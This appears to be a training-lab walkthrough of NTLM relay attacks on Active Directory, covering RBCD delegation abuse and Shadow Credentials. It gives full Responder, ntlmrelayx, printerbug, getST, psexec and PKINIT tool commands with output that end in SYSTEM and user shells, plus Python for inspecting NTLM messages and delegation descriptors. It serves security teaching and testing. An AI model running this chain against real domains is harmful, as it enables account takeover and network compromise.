NTLM Relay Attacks Against Kerberos
1. Kerberos RBCD Abuse
RBCD
By default, a computer account can write its own msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
If we can coerce the target computer into performing NTLM authentication and relay that authentication to the DC's LDAP service, we can write its msDS-AllowedToActOnBehalfOfOtherIdentity attribute and add whatever principal we want (resource-based constrained delegation, RBCD).
Coercing the target over SMB does not work against LDAP on a patched DC: an SMB client sets the NTLMSSP_NEGOTIATE_SIGN flag in its NTLM messages, so the DC's LDAP service expects the relayed session to be signed, and the relay cannot sign without the session key (ntlmrelayx reports that the client requested signing and gives up). WebDAV/HTTP clients do not negotiate signing, so the coerced authentication has to arrive over HTTP instead of the default SMB. The exception is a DC that is unpatched for CVE-2019-1040 (the MIC is not verified there): ntlmrelayx's --remove-mic option then strips the MIC and clears the signing flags, and SMB NTLM authentication can be relayed to the DC's LDAP service after all.
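The flag in question can be read straight out of the type 3 message. The following Python, added here as an example (it is not code from the page, from impacket or from Responder), constructs two minimal AUTHENTICATE_MESSAGEs with zero-filled dummy responses, one with NTLMSSP_NEGOTIATE_SIGN set as an SMB client would and one without, and reports what a relay server sees for each. Field offsets follow MS-NLMP; the user, domain and workstation names are made up.

```python
import struct

# NegotiateFlags bits from MS-NLMP 2.2.2.5
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
NTLMSSP_NEGOTIATE_SIGN = 0x00000010        # the flag that makes LDAP on a DC expect signing
NTLMSSP_NEGOTIATE_VERSION = 0x02000000
SIGNATURE = b"NTLMSSP\x00"
AUTHENTICATE = 3


def build_authenticate(flags, user="SQL01$", domain="INLANEFREIGHT",
                       workstation="LINUX01", mic=b"\x00" * 16):
    """Construct a minimal AUTHENTICATE_MESSAGE (constructed test data: the
    LM/NTLMv2 responses are zero filled and prove nothing)."""
    blobs = [b"\x00" * 24, b"\x00" * 16,                  # LmChallengeResponse, NtChallengeResponse
             domain.encode("utf-16-le"), user.encode("utf-16-le"),
             workstation.encode("utf-16-le"), b""]         # EncryptedRandomSessionKey (absent)
    fixed_len = 88                                         # header, 6 descriptors, flags, Version, MIC
    descriptors, payload, off = [], b"", fixed_len
    for blob in blobs:
        descriptors.append(struct.pack("<HHI", len(blob), len(blob), off))  # Len, MaxLen, Offset
        payload += blob
        off += len(blob)
    version = struct.pack("<BBH3xB", 10, 0, 17763, 0x0F)   # made-up Windows build, NTLMSSP_REVISION_W2K3
    return (SIGNATURE + struct.pack("<I", AUTHENTICATE) + b"".join(descriptors)
            + struct.pack("<I", flags | NTLMSSP_NEGOTIATE_VERSION) + version + mic + payload)


def _field(msg, index):
    """Bytes of the index-th variable field (0 = LmChallengeResponse ... 4 = Workstation)."""
    length, _, offset = struct.unpack_from("<HHI", msg, 12 + 8 * index)
    return msg[offset:offset + length]


def inspect_authenticate(msg):
    """Report what a relay server sees: whether the client negotiated signing (then the
    DC's LDAP service will expect a signed session and the relay is useless) and whether
    a MIC binds the flags (then they cannot be silently cleared on a patched DC)."""
    if msg[:8] != SIGNATURE or struct.unpack_from("<I", msg, 8)[0] != AUTHENTICATE:
        raise ValueError("not an NTLM AUTHENTICATE_MESSAGE")
    flags = struct.unpack_from("<I", msg, 60)[0]
    # The smallest payload offset gives the length of the fixed part: 64 means no
    # Version/MIC, 72 means Version only, 88 means Version and MIC are both present.
    offsets = [struct.unpack_from("<I", msg, 16 + 8 * i)[0]
               for i in range(6) if struct.unpack_from("<H", msg, 12 + 8 * i)[0]]
    fixed_len = min(offsets) if offsets else len(msg)
    mic = msg[72:88] if fixed_len >= 88 else b""
    signing = bool(flags & NTLMSSP_NEGOTIATE_SIGN)
    return {
        "domain": _field(msg, 2).decode("utf-16-le"),
        "user": _field(msg, 3).decode("utf-16-le"),
        "signing_negotiated": signing,
        "mic_present": mic != b"" and mic != b"\x00" * 16,
        "relay_to_ldap_ok": not signing,
    }


if __name__ == "__main__":
    # What an SMB client sends (signing negotiated) versus what the WebDAV client sends.
    smb_style = build_authenticate(NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_NEGOTIATE_SIGN, mic=b"\x11" * 16)
    http_style = build_authenticate(NTLMSSP_NEGOTIATE_UNICODE, mic=b"\x22" * 16)
    for label, m in (("SMB-origin", smb_style), ("HTTP-origin", http_style)):
        print(label, inspect_authenticate(m))
```

The same check is the first thing to run on a capture when a relay to LDAP fails unexpectedly: if signing_negotiated is true the origin protocol, not the DC, is the problem, and only a missing MIC (CVE-2019-1040) would let the flag be cleared in transit.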
1.1. Enumeration
1.1.1. Forcing the WebClient service on
The WebClient (WebDAV) service is not running by default on workstations and servers, and it is what makes a target authenticate over HTTP. First use the crackmapexec (nxc) drop-sc module against the writable shares \\DC01\Testing and \\DC01\smb: it drops a .searchConnector-ms file that starts the WebClient service on any machine whose user opens the share in Explorer, here SQL01 and WS01.
crackmapexec smb 172.16.117.3 -u anonymous -p '' -M drop-sc -o URL=https://172.16.117.30/testing FILENAME=@secret
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
SMB 172.16.117.3 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.117.3 445 DC01 [+] INLANEFREIGHT.LOCAL\anonymous:
DROP-SC 172.16.117.3 445 DC01 [+] Found writable share: smb
DROP-SC 172.16.117.3 445 DC01 [+] [OPSEC] Created @secret.searchConnector-ms file on the smb share
DROP-SC 172.16.117.3 445 DC01 [+] Found writable share: Testing
DROP-SC 172.16.117.3 445 DC01 [+] [OPSEC] Created @secret.searchConnector-ms file on the Testing share
Then check with the webdav module which hosts now have the WebClient service running:
crackmapexec smb 172.16.117.0/24 -u plaintext$ -p o6@ekK5#rlw2rAe -M webdav
SMB 172.16.117.3 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.117.50 445 WS01 [*] Windows 10.0 Build 17763 x64 (name:WS01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB 172.16.117.60 445 SQL01 [*] Windows 10.0 Build 17763 x64 (name:SQL01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB 172.16.117.3 445 DC01 [+] INLANEFREIGHT.LOCAL\plaintext$:o6@ekK5#rlw2rAe
SMB 172.16.117.50 445 WS01 [+] INLANEFREIGHT.LOCAL\plaintext$:o6@ekK5#rlw2rAe
WEBDAV 172.16.117.50 445 WS01 WebClient Service enabled on: 172.16.117.50
SMB 172.16.117.60 445 SQL01 [+] INLANEFREIGHT.LOCAL\plaintext$:o6@ekK5#rlw2rAe
WEBDAV 172.16.117.60 445 SQL01 WebClient Service enabled on: 172.16.117.60
1.2. Attack
1.2.1. Responder configuration
python3 Responder.py -I ens192
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
<SNIP>
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [OFF]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [OFF]
<SNIP>
Responder is only needed here for its LLMNR, NBT-NS and mDNS poisoning, so that the short name (LINUX01) we hand to the coercion resolves to the attack host; the WebClient only authenticates automatically to a name it considers intranet, i.e. one without dots. Make sure both the SMB and HTTP servers are Off so that they do not bind the ports ntlmrelayx listens on; otherwise Responder would capture the HTTP NTLM authentication from SQL01$ instead of letting ntlmrelayx relay it:
1.2.2. Relaying with ntlmrelayx
Then start ntlmrelayx with the domain controller's (172.16.117.3) LDAPS (or LDAP) service as the target and the --delegate-access option, which performs the RBCD attack.
With --escalate-user we name the account we control, plaintext$, to be written into the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of SQL01$ (the account whose authentication is relayed). Without this option ntlmrelayx creates a new computer account for the purpose, which only works while ms-DS-MachineAccountQuota allows it.
ntlmrelayx.py -t ldaps://INLANEFREIGHT\\'SQL01$'@172.16.117.3 --delegate-access --escalate-user 'plaintext$' --no-smb-server --no-dump
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
1.2.3. Coercing the target to authenticate
Use printerbug.py (from krbrelayx) to make SQL01$ authenticate to our attack host over HTTP. The listener is given as LINUX01@80/print: a short NetBIOS-style name with @80 and a path is the UNC form that the spooler hands to the WebDAV mini-redirector, so the authentication arrives as HTTP NTLM rather than SMB. The RPC_S_SERVER_UNAVAILABLE error below is expected; the authentication has already been sent by the time the spooler reports that its callback failed.
python3 printerbug.py inlanefreight/plaintext$:'o6@ekK5#rlw2rAe'@172.16.117.60 LINUX01@80/print
[*] Impacket v0.11.0 - Copyright 2023 Fortra
[*] Attempting to trigger authentication via rprn RPC at 172.16.117.60
[*] Bind OK
[*] Got handle
RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE - The RPC server is unavailable.
[*] Triggered RPC backconnect, this may or may not have worked
ntlmrelayx relays the HTTP NTLM authentication to the DC over LDAPS:
[*] HTTPD(80): Connection from INLANEFREIGHT/SQL01$@172.16.117.60 controlled, attacking target ldaps://INLANEFREIGHT\SQL01$@172.16.117.3
[*] HTTPD(80): Authenticating against ldaps://INLANEFREIGHT\SQL01$@172.16.117.3 as INLANEFREIGHT/SQL01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Delegation rights modified succesfully!
[*] plaintext$ can now impersonate users on SQL01$ via S4U2Proxy
[*] All targets processed!
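What ntlmrelayx actually wrote is a binary security descriptor whose DACL contains an ACCESS_ALLOWED_ACE for the SID of plaintext$. The Python below, added as an example (not the page's or impacket's code), builds that descriptor from a SID the way ntlmrelayx does (BUILTIN\Administrators as owner, one full-control ACE per delegate) and parses one back into the list of SIDs allowed to delegate, which is the check to run against a computer's msDS-AllowedToActOnBehalfOfOtherIdentity value when auditing for this attack. The SIDs used are made up; the layouts follow MS-DTYP.

```python
import struct

# SECURITY_DESCRIPTOR Control bits and ACE constants from MS-DTYP
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 4
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF            # the mask ntlmrelayx grants to the delegating account
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"


def sid_to_bytes(sid):
    """Text SID to binary SID: Revision, SubAuthorityCount, 6-byte big-endian
    IdentifierAuthority, then little-endian sub-authorities."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("bad SID: " + sid)
    subs = [int(x) for x in parts[3:]]
    return (struct.pack("<BB", 1, len(subs)) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(data, offset=0):
    rev, count = struct.unpack_from("<BB", data, offset)
    authority = int.from_bytes(data[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, offset + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs))


def build_rbcd_sd(delegate_sids, owner_sid=BUILTIN_ADMINISTRATORS):
    """Self-relative security descriptor with one ACCESS_ALLOWED_ACE per delegate."""
    aces = b""
    for sid in delegate_sids:
        sid_b = sid_to_bytes(sid)
        # ACE: AceType, AceFlags, AceSize, Mask, then the trustee SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL) + sid_b
    # ACL header: AclRevision, Sbz1, AclSize, AceCount, Sbz2
    acl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(delegate_sids), 0) + aces
    owner = sid_to_bytes(owner_sid)
    # SD header: Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         20, 0, 0, 20 + len(owner))
    return header + owner + acl


def parse_rbcd_sd(sd):
    """Return the SIDs granted by ACCESS_ALLOWED ACEs in the DACL: the principals that
    may S4U2Proxy to services on the computer holding the attribute."""
    rev, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    pos, sids = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, _mask = struct.unpack_from("<BBHI", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(bytes_to_sid(sd, pos + 8))
        pos += ace_size
    return sids


if __name__ == "__main__":
    # Constructed SID standing in for plaintext$ (not the lab's real value).
    sd = build_rbcd_sd(["S-1-5-21-1111111111-2222222222-3333333333-1105"])
    print(sd.hex())
    print("allowed to act on behalf of other identity:", parse_rbcd_sd(sd))
```

When auditing, feed the raw attribute bytes read from LDAP into parse_rbcd_sd and resolve the returned SIDs; any computer whose list contains an account you do not expect to delegate to it deserves a look, since ntlmrelayx appends to an existing descriptor rather than replacing it.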
1.2.4. Obtaining a service ticket
Now use impacket's getST.py as plaintext$ to request a service ticket for cifs/sql01.inlanefreight.local on behalf of Administrator (S4U2Self followed by S4U2Proxy). This only works for accounts that can be delegated: if Administrator were a member of Protected Users or marked "Account is sensitive and cannot be delegated", the S4U2Proxy step would fail and another privileged user would have to be impersonated.
getST.py -spn cifs/sql01.inlanefreight.local -impersonate Administrator -dc-ip 172.16.117.3 "INLANEFREIGHT"/"plaintext$":"o6@ekK5#rlw2rAe"
Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
1.2.5. psexec
KRB5CCNAME=Administrator.ccache psexec.py -k -no-pass sql01.inlanefreight.local
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on sql01.inlanefreight.local.....
[*] Found writable share ADMIN$
[*] Uploading file MpAADkGH.exe
[*] Opening SVCManager on sql01.inlanefreight.local.....
[*] Creating service pVuJ on sql01.inlanefreight.local.....
[*] Starting service pVuJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2628]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
Other variants of this attack exist and other tools can perform it; DavRelayUp by Mor Davidovich carries out the same chain locally on the victim, without having to export the service ticket (ST) and use it from a remote machine.
2. Shadow Credentials
If we take control of an object that holds privileged ACLs over other objects, we can usually exploit that by:
- resetting the target account's password
- stealing the account's NTLMv2 hash and trying to crack it offline
In practice these techniques (password resets in particular) are noisy, so we can use Shadow Credentials to take over the user instead; see the related article here.
A Shadow Credentials attack adds an alternate credential (a certificate key pair) to the account's msDS-KeyCredentialLink attribute. With it the attacker can obtain a TGT for the account through PKINIT and, from that TGT, recover the user's or computer's NTLM hash. The shadow credential survives a password change of the user or computer.
2.1. Attack
The attack requires that the domain supports PKINIT (Kerberos pre-authentication with X.509 certificates), which is normally the case when AD Certificate Services or another internal PKI is installed so that the domain controllers hold certificates usable for Kerberos authentication. It also needs a Windows Server 2016 or later domain controller, and the account whose authentication we relay must have write access to the target's msDS-KeyCredentialLink attribute (here CJAQ over jperez).
2.1.1. Responder poisoning
Run Responder with the HTTP server set to Off, so that port 80 is left to ntlmrelayx:
python3 Responder.py -I ens192
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
<SNIP>
[+] Servers:
HTTP server [OFF]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
<SNIP>
2.1.2. Relaying with ntlmrelayx
ntlmrelayx.py -t ldap://INLANEFREIGHT\\CJAQ@172.16.117.3 --shadow-credentials --shadow-target jperez --no-da --no-dump --no-acl --no-smb-server
Impacket v0.11.0 - Copyright 2023 Fortra
<SNIP>
[*] Servers started, waiting for connections
Relevant options:
- --shadow-credentials: perform the Shadow Credentials attack
- --shadow-target: the account whose msDS-KeyCredentialLink attribute is written (jperez)
- --no-da, --no-acl, --no-dump: skip ntlmrelayx's default domain-admin escalation, ACL enumeration and LDAP dump, which are noisy and not needed here
- --no-smb-server: do not start ntlmrelayx's own SMB server, since Responder's is on
Relaying CJAQ's authentication produces:
ntlmrelayx.py -t ldap://INLANEFREIGHT\\CJAQ@172.16.117.3 --shadow-credentials --shadow-target jperez --no-da --no-dump --no-acl --no-smb-server
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Servers started, waiting for connections
[*] Setting up RAW Server on port 6666
[*] HTTPD(80): Client requested path: /xml;
[*] HTTPD(80): Connection from INLANEFREIGHT/CJAQ@172.16.117.60 controlled, attacking target ldap://INLANEFREIGHT\CJAQ@172.16.117.3
[*] HTTPD(80): Client requested path: /i0t823yj4q
[*] HTTPD(80): Authenticating against ldap://INLANEFREIGHT\CJAQ@172.16.117.3 as INLANEFREIGHT/CJAQ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] All targets processed!
[*] Searching for the target account
[*] Target user found: CN=Jeffry Perez,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 0e7ed4f1-1a8f-180b-cb7a-602f765c9cc6
[*] Updating the msDS-KeyCredentialLink attribute of jperez
[*] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Saved PFX (#PKCS12) certificate & key at path: rbnYdUv8.pfx
[*] Must be used with password: NRzoep723H6Yfc0pY91Z
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
[*] Run the following command to obtain a TGT
[*] python3 PKINITtools/gettgtpkinit.py -cert-pfx rbnYdUv8.pfx -pfx-pass NRzoep723H6Yfc0pY91Z INLANEFREIGHT.LOCAL/jperez rbnYdUv8.ccache
ntlmrelayx saves the certificate and private key as a password-protected PFX file.
2.1.3. Obtaining a TGT
Use gettgtpkinit.py from PKINITtools to obtain a TGT for jperez with the PFX. Keep the AS-REP encryption key it prints: getnthash.py from the same toolkit uses it, together with the TGT, to recover the account's NT hash through a user-to-user (U2U) ticket request, which is how the NTLM hash mentioned above is obtained.
python3 gettgtpkinit.py -cert-pfx rbnYdUv8.pfx -pfx-pass NRzoep723H6Yfc0pY91Z INLANEFREIGHT.LOCAL/jperez jperez.ccache
2023-07-31 13:24:29,645 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2023-07-31 13:24:29,666 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2023-07-31 13:24:29,695 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2023-07-31 13:24:29,696 minikerberos INFO 6bbf39c678fc71c1272a12379620345da082382c3b253af51a65ccc2204e8184
INFO:minikerberos:6bbf39c678fc71c1272a12379620345da082382c3b253af51a65ccc2204e8184
2023-07-31 13:24:29,700 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
KRB5CCNAME=jperez.ccache evil-winrm -i dc01.inlanefreight.local -r INLANEFREIGHT.LOCAL
Evil-WinRM shell v3.5
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jperez\Documents> whoami
inlanefreight\jperez
